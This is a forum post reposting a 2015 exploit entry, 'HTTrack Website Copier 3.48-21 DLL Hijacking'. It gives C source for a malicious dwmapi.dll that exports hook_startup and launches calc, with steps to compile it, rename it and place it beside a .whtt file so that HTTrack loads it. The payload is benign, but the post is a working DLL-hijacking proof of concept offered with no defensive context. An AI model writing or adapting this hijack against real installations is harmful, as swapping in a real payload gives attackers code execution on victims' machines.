Jump to content
Aerosol

HTTrack Website Copier 3.48-21 - DLL Hijacking

Recommended Posts

Posted

#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking
#[+] Date: 28-03-2015
#[+] Type: Local Exploits
#[+] Vendor: https://httrack.com/page/2/fr/index.html
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that
# the 2 files are in the same dir.
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void hook_startup() { exp(); }

int exp()
{
WinExec("calc", 0);
exit(0);
return 0;
}

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...